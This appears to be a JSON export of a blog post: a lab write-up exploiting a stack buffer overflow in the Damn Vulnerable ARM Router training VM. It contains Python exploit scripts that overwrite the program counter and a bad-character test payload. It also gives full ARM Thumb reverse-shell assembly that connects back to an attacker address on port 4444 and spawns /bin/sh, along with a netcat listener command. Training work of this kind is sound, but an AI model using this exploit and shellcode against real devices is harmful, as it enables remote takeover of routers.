{"id":861,"date":"2024-03-17T01:48:27","date_gmt":"2024-03-17T00:48:27","guid":{"rendered":"https:\/\/babdcatha.net\/?p=861"},"modified":"2024-03-17T02:39:34","modified_gmt":"2024-03-17T01:39:34","slug":"damn-vulnerable-arm-router-writeup","status":"publish","type":"post","link":"https:\/\/babdcatha.net\/index.php\/2024\/03\/17\/damn-vulnerable-arm-router-writeup\/","title":{"rendered":"Damn Vulnerable Arm Router Writeup"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Hi, coming back after a few months, I wanted to try something a little different. Today, We will be taking a look at the Damn Vulnerable Arm Router (DVAR) machine from <a href=\"https:\/\/www.vulnhub.com\/author\/saumil-shah,576\/\">Saumil Shah<\/a>. The goal of this machine is to find and exploit a buffer overflow vulnerability on a simulated router running on an ARM architecture.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The writeup will be split into the following parts:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#Setup\">Setup<\/a><\/li>\n\n\n\n<li><a href=\"#First_look\">First look<\/a><\/li>\n\n\n\n<li><a href=\"#GDB\">Setting up GDB<\/a><\/li>\n\n\n\n<li><a href=\"#Exploit\">Writing the exploit<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"Setup\">Setup<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The first step was getting the project to run. The project can be downloaded from <a href=\"https:\/\/www.vulnhub.com\/entry\/damn-vulnerable-arm-router-dvar-tinysploitarm,224\/\">VulnHub<\/a>. It can be run as-is using VMWare, but if you prefer to use VirtualBox, the image can be converted using <a href=\"https:\/\/developer.vmware.com\/web\/tool\/ovf\/\">Ovftool<\/a> and the following command:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">ovftool \"image.vmx\" \"image.ovf\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Make sure to set the network interface in <code>Bridge<\/code> mode, or the router won&#8217;t be accessible from outside the VM.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Since we are going to debug ARM binaries, we need to have the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\"><code>gdb-multiarch<\/code><\/mark> package installed on the machine doing the debugging.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">I will also be using <a href=\"https:\/\/github.com\/hugsy\/gef\">GEF<\/a>, so I recommend adding it to the your <code>.gdbinit<\/code> file to have it launch automatically at the start of GDB.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Finally, we will be compiling\/assembling a reverse shell for an ARM architecture. You can either compile it on a virtual machine emulating an ARM processor or install the <code>gcc-arm-linux-gnueabi<\/code> packet.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"First_look\">First look<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">After launching the VM, we are greeted with the following screen:<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized wp-duotone-unset-1\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"401\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Router_welcome.png\" alt=\"\" class=\"wp-image-867\" style=\"width:566px;height:auto\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Router_welcome.png 720w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Router_welcome-300x167.png 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Navigating to the provided IP, we are greeted with the following page:<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized wp-duotone-unset-2\"><img loading=\"lazy\" decoding=\"async\" width=\"811\" height=\"912\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Interface_first_look.png\" alt=\"\" class=\"wp-image-868\" style=\"width:544px;height:auto\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Interface_first_look.png 811w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Interface_first_look-267x300.png 267w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Interface_first_look-768x864.png 768w\" sizes=\"auto, (max-width: 811px) 100vw, 811px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">This looks like the interface we are supposed to attack. We can try to modify parameters, but the server does not seem to respond to these requests. We&#8217;ll need to investigate this. Let&#8217;s ssh into the router (root without a password) to learn more about the process. We can find processes listening using the netstat command:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-3\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"562\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/netstat-1024x562.png\" alt=\"\" class=\"wp-image-874\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/netstat-1024x562.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/netstat-300x165.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/netstat-768x421.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/netstat.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><code>lightsrv<\/code> is supposed to be a bonus challenge, so let&#8217;s focus on <code>miniweb<\/code> first.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"GDB\">Setting up GDB<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Now that we know We can start a remote debug session on the router using <code>gdbserver<\/code> and attach it to the running <code>miniweb<\/code> process:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">gdbserver --attach localhost:5000 $PID<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">In our case, the PID of the <code>miniweb<\/code> process is 245.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">On our kali machine, we can launch our multiarch gdb with <a href=\"https:\/\/github.com\/hugsy\/gef\">GEF<\/a> to start debugging the remote process:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">gdb-multiarch -q\ngef-remote $IP $PORT<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Immediately after we start using it, we can see that the <code>miniweb<\/code> binary uses forks to serve webpages to its clients. <\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large wp-duotone-unset-4\"><img loading=\"lazy\" decoding=\"async\" width=\"933\" height=\"1024\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_forks-933x1024.png\" alt=\"\" class=\"wp-image-897\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_forks-933x1024.png 933w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_forks-273x300.png 273w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_forks-768x843.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_forks.png 1280w\" sizes=\"auto, (max-width: 933px) 100vw, 933px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">This is to be expected from a web server. Since these forks will be handling our inputs, we will need to follow these forks instead of the main process in order to find our exploit. This can be done using the following gdb command:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">set follow-fork-mode child<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If we now try saving a configuration from the webpage, this is what we get:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-5\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"612\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_sigsegv-1024x612.png\" alt=\"\" class=\"wp-image-906\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_sigsegv-1024x612.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_sigsegv-300x179.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_sigsegv-768x459.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_sigsegv.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">A Segmentation fault! And the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\"><code>$pc<\/code><\/mark> register seems to have been overwritten with the string <code>\"ddr_\"<\/code>, probably contained in the web request we just sent. If we look at it using <code>Burp<\/code>, we can indeed see the <code>\"ddr_\"<\/code> string repeated several times.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large wp-duotone-unset-6\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"352\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_request-1024x352.png\" alt=\"\" class=\"wp-image-921\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_request-1024x352.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_request-300x103.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_request-768x264.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_request.png 1100w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The next step after this is to begin writing the exploit.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"Exploit\">Writing the exploit<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The first step is to find the right offset for the program counter. This can be done using the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">pattern_create<\/mark> and <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">pattern_offset<\/mark> tools from the Metsaploit Framework. We will create a pattern of length 1000, place it in our request and check the offsets of the different registers we can overwrite.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large wp-duotone-unset-7\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"285\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_create-1024x285.png\" alt=\"\" class=\"wp-image-926\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_create-1024x285.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_create-300x83.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_create-768x214.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_create.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Creating the pattern<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large wp-duotone-unset-8\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"396\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_pattern-1024x396.png\" alt=\"\" class=\"wp-image-927\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_pattern-1024x396.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_pattern-300x116.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_pattern-768x297.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_pattern.png 1098w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Sending the pattern using Burp<\/figcaption><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We get this output on the debugger console:<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large wp-duotone-unset-9\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"610\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_pattern-1024x610.png\" alt=\"\" class=\"wp-image-929\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_pattern-1024x610.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_pattern-300x179.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_pattern-768x457.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_pattern.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The program counter seems to be set right below the link register (If I remember correctly, this is because the LSB of the program counter is used to switch between ARM and Thumb modes). We now calculate the offset to the link register using the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">pattern_offset<\/mark> tool:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized wp-duotone-unset-10\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"175\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_offset-1024x175.png\" alt=\"\" class=\"wp-image-932\" style=\"width:750px;height:auto\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_offset-1024x175.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_offset-300x51.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_offset-768x131.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_offset.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We find that the link register is at offset 333 from our input. We can repeat this test a few more times to ensure that there is no variability in the offset, but in this case, the offset is constant.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We can now create a small Python script to write the value of our choice in the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\"><code>$pc<\/code><\/mark> register.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">import requests\n\n#Exploit parameters\nURL = \"http:\/\/192.168.1.100\/basic.html?\"\noffset = 333\n\n#Filling memory with 0x40 until the pc offset\nfiller = 'A' * offset;\n\n#The value to be written to the pc\npc = 'BBBB'\n\n#Creating the complete payload\npayload = URL + filler + pc\n\n#making the malicious request\nr = requests.get(url=payload)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And, when we execute it, we get the expected value in the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\"><code>$pc<\/code><\/mark> register.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-11\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"610\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_BBBB-1024x610.png\" alt=\"\" class=\"wp-image-938\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_BBBB-1024x610.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_BBBB-300x179.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_BBBB-768x457.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_BBBB.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The next step is finding out how we can exploit this to jump to code we can control.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We can see what security features are enabled using the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">checksec<\/mark> GEF command:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-12\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"562\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_checksec-1024x562.png\" alt=\"\" class=\"wp-image-941\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_checksec-1024x562.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_checksec-300x165.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_checksec-768x421.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_checksec.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">In our case, no particular security measure was put in place to prevent us from writing code to the stack and jumping to it.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To take advantage of this, we are going to do the following:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Find the offset of the stack<\/li>\n\n\n\n<li>Find out what bytes we can and cannot use<\/li>\n\n\n\n<li>Create a reverse shell and write it on the stack<\/li>\n\n\n\n<li>Write the address of the stack to the PC<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">If everything works correctly, we should then get a reverse shell.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For the first step, looking back at our pattern, we can see that the data <code>$sp<\/code> points to (<code>7Al8<\/code>) is located at offset 353. We can also see that the <code>sp<\/code> will always point to address <code>0xbefffe48<\/code>. Because of this, we can get away with jumping directly to the stack, instead of finding a gadget to make us jump there.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In order to get our payload in the right place, we add a small nopsled of 16 bytes to get from the <code>pc<\/code> to the start of the stack. In our case, since ASLR is not enabled, we can use anything for this pseudo-nopsled.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This gives us the following updated python code:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">import requests\n\n#Exploit parameters\nURL = \"http:\/\/192.168.1.100\/basic.html?\"\npc_offset = 333\nsp_offset = 353\n\n#Filling memory with 0x40 until the pc offset\nfiller = 'A' * pc_offset;\n\n#The value to be written to the pc ($sp)\npc = '%A8%BB%FF%BE'\n\n#Setting up a pseudo-nopsled before the payload\nnopsled = \"CCCC\" * (((sp_offset - pc_offset) \/\/ 4) - 1)\n\n#The payload to execute\npayload = \"DDDD\"\n\n#Creating the complete payload\nexploit = URL + filler + pc + nopsled + payload\n\n#making the malicious request\nr = requests.get(url=exploit)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">For the second step, we are going to send every possible byte in our payload, and note the bytes that are not correctly written to memory. We can already exclude the null byte (<code>0x00<\/code>) as it cannot be sent in query parameters.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In our case, it looks like only bytes from the ASCII table can be used, as values above <code>0x7F<\/code> will be converted to UTF-8 and a <code>0xC2<\/code> byte will be appended after. This seemed a bit weird to me, so I investigated and found out that almost all bytes could be sent, if we URL encoded them first.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Using this payload :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">payload = \"%01%02%03%04%05%06%07%08%09%0a%0b%0c%0d%0e%0f%10%11%12%13%14%15%16%17%18%19%1a%1b%1c%1d%1e%1f%20%21%23%24%25%26%27%28%29%2a%2b%2c%2d%2e%2f%30%31%32%33%34%35%36%37%38%39%3a%3b%3c%3d%3e%3f%40%41%42%43%44%45%46%47%48%49%4a%4b%4c%4d%4e%4f%50%51%52%53%54%55%56%57%58%59%5a%5b%5c%5d%5e%5f%60%61%62%63%64%65%66%67%68%69%6a%6b%6c%6d%6e%6f%70%71%72%73%74%75%76%77%78%79%7a%7b%7c%7d%7e%7f%80%81%82%83%84%85%86%87%88%89%8a%8b%8c%8d%8e%8f%90%91%92%93%94%95%96%97%98%99%9a%9b%9c%9d%9e%9f%a0%a1%a2%a3%a4%a5%a6%a7%a8%a9%aa%ab%ac%ad%ae%af%b0%b1%b2%b3%b4%b5%b6%b7%b8%b9%ba%bb%bc%bd%be%bf%c0%c1%c2%c3%c4%c5%c6%c7%c8%c9%ca%cb%cc%cd%ce%cf%d0%d1%d2%d3%d4%d5%d6%d7%d8%d9%da%db%dc%dd%de%df%e0%e1%e2%e3%e4%e5%e6%e7%e8%e9%ea%eb%ec%ed%ee%ef%f0%f1%f2%f3%f4%f5%f6%f7%f8%f9%fa%fb%fc%fd%fe%ff\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We get the following bytes written to the stack:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-13\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"666\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_badchars-1024x666.png\" alt=\"\" class=\"wp-image-971\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_badchars-1024x666.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_badchars-300x195.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_badchars-768x500.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_badchars.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Only byte <code>0x22<\/code> is not correctly sent.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Now, we can work on the last step of our exploit development. We need a payload to execute. I will start with a basic reverse shell from <a href=\"https:\/\/azeria-labs.com\/tcp-reverse-shell-in-assembly-arm-32-bit\/\">Azeria<\/a>. I save the assembly shellcode in a file called shell.asm, and execute the following commands to compile it and get the bytecode in the right format for the payload (see the blog post on Azeria labs for explanations):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">arm-linux-gnueabi-as shell.asm -o reverse_shell.o -march=armv6 &amp;&amp; arm-linux-gnueabi-ld -N reverse_shell.o -o reverse_shell\n\narm-linux-gnueabi-objcopy -O binary reverse_shell reverse_shell.bin\n\nhexdump -v -e '\"x\" 1\/1 \"%02x\" \"\"' reverse_shell.bin | tr \"x\" \"%\" <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This command gives us our shellcode, ready to be pasted in our python script:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-14\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"227\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/shellcode-1024x227.png\" alt=\"\" class=\"wp-image-992\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/shellcode-1024x227.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/shellcode-300x67.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/shellcode-768x170.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/shellcode.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We can now start a listener on port 4444 of our kali machine:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">nc -lvnp 4444<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We should now be ready to exploit the router, but a small problem arises. When we execute our script, we get a ping on our listener, but our reverse shell disconnects instantly.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large wp-duotone-unset-15\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"210\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/crash-1024x210.png\" alt=\"\" class=\"wp-image-998\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/crash-1024x210.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/crash-300x61.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/crash-768x157.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/crash.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Our shell instantly exits<\/figcaption><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">After a bit of debugging, I found <a href=\"https:\/\/stackoverflow.com\/questions\/36673765\/why-can-the-execve-system-call-run-bin-sh-without-any-argv-arguments-but-not\">this<\/a> post on StackOverflow. To summarize, programs usually require the first argument of <code>argv<\/code> to be the program name. This is usually not a problem with <code>sh<\/code>, so this was not implemented in Azeria&#8217;s shell to save on space. However, this seems to be necessary with the busybox implementation of <code>sh<\/code>. After a bit of tinkering, I was able to produce this assembly, which pushes the path onto the stack with a null pointer, and points to this as its second argument. I tried to do this in the payload, but using the stack was easier, since we need a pointer to a pointer to the arguments.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This is the shellcode I ended up using:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"wasm\" class=\"language-wasm\">.section .text\n.global _start\n\n_start:\n .ARM\n add   r3, pc, #1       \/\/ switch to thumb mode \n bx    r3\n\n.THUMB\n\/\/ socket(2, 1, 0) \n mov   r0, #2\n mov   r1, #1\n sub   r2, r2\n mov   r7, #200\n add   r7, #81         \/\/ r7 = 281 (socket) \n svc   #1              \/\/ r0 = resultant sockfd \n mov   r4, r0          \/\/ save sockfd in r4 \n\n\/\/ connect(r0, &amp;sockaddr, 16) \n adr   r1, struct        \/\/ pointer to address, port \n strb  r2, [r1, #1]    \/\/ write 0 for AF_INET \n mov   r2, #16\n add   r7, #2          \/\/ r7 = 283 (connect) \n svc   #1\n\n\/\/ dup2(sockfd, 0) \n mov   r7, #63         \/\/ r7 = 63 (dup2) \n mov   r0, r4          \/\/ r4 is the saved sockfd \n sub   r1, r1          \/\/ r1 = 0 (stdin) \n svc   #1\n \n\/\/ dup2(sockfd, 1) \n mov   r0, r4          \/\/ r4 is the saved sockfd \n mov   r1, #1          \/\/ r1 = 1 (stdout) \n svc   #1\n \n\/\/ dup2(sockfd, 2) \n mov   r0, r4         \/\/ r4 is the saved sockfd \n mov   r1, #2         \/\/ r1 = 2 (stderr)\n svc   #1\n\n\/\/ execve(\"\/bin\/sh\", 0, 0) \n adr   r0, binsh\n sub   r2, r2\n push  {r2}          \/\/ Pushing (\"\/bin\/sh\", \"\") to the stack\n push  {r0}          \/\/ in reverse, since we are on the stack\n mov   r1, sp        \/\/ Passing it as argv\n strb  r2, [r0, #7]  \/\/ null-terminating the binsh string\n mov   r7, #11       \/\/ r7 = 11 (execve) \n svc   #1\n\nstruct:\n.ascii \"\\x02\\xff\"      \/\/ AF_INET 0xff will be NULLed \n.ascii \"\\x11\\x5c\"      \/\/ port number 4444 \n.byte 192,168,XXX,XXX  \/\/ IP Address \nbinsh:\n.ascii \"\/bin\/shX\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">we can now compile our code again, and this time, we get our reverse shell as expected:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-16\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"331\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/revshell_working-1024x331.png\" alt=\"\" class=\"wp-image-1013\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/revshell_working-1024x331.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/revshell_working-300x97.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/revshell_working-768x248.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/revshell_working.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And just like that, this challenge is now complete !<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi, coming back after a few months, I wanted to try something a little different. Today, We will be taking a look at the Damn Vulnerable Arm Router (DVAR) machine from Saumil Shah. The goal of this machine is to find and exploit a buffer overflow vulnerability on a simulated router running on an ARM [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4],"tags":[],"class_list":["post-861","post","type-post","status-publish","format-standard","hentry","category-writeups"],"featured_image_src":null,"author_info":{"display_name":"BabdCatha","author_link":"https:\/\/babdcatha.net\/index.php\/author\/admin4804\/"},"_links":{"self":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/861","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/comments?post=861"}],"version-history":[{"count":134,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/861\/revisions"}],"predecessor-version":[{"id":1027,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/861\/revisions\/1027"}],"wp:attachment":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/media?parent=861"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/categories?post=861"},{"taxonomy":"post_tag","embeddable":t